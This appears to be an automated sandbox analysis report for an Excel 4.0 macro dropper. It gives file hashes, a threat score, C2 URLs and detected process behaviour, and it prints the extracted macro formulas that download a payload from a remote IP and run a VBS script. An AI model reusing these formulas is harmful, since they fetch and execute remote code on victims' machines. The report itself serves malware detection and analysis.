General

  • Target

    b58819478207e2b02133f400a88f9936

  • Size

    6KB

  • Sample

    231222-rc3s2sefck

  • MD5

    b58819478207e2b02133f400a88f9936

  • SHA1

    3b759676bd6bd336597a9d87de0ef45657749d49

  • SHA256

    53f8c6db4bcef875a92d7e19b2a864ec1de6ecbd6ed5296a23d58fa9654250ae

  • SHA512

    20045a5d71ce995402947dde4ad3ac9258a96d9f92fbd667ab1ea62a00e056c46187252d1b6c4d7223558b2d428d228be5b8b5791552a5618a7283009227ebb3

  • SSDEEP

    192:NDSvuSlbrA2OmmfRU8UhHFBFYuCb98ywOMOruO5pOGOrOd+mOTOzOPOIOd:N8uuM2we1FY/b98ywOMOruO5pOGOrOPj

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      b58819478207e2b02133f400a88f9936

    • Size

      6KB

    • MD5

      b58819478207e2b02133f400a88f9936

    • SHA1

      3b759676bd6bd336597a9d87de0ef45657749d49

    • SHA256

      53f8c6db4bcef875a92d7e19b2a864ec1de6ecbd6ed5296a23d58fa9654250ae

    • SHA512

      20045a5d71ce995402947dde4ad3ac9258a96d9f92fbd667ab1ea62a00e056c46187252d1b6c4d7223558b2d428d228be5b8b5791552a5618a7283009227ebb3

    • SSDEEP

      192:NDSvuSlbrA2OmmfRU8UhHFBFYuCb98ywOMOruO5pOGOrOd+mOTOzOPOIOd:N8uuM2we1FY/b98ywOMOruO5pOGOrOPj

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks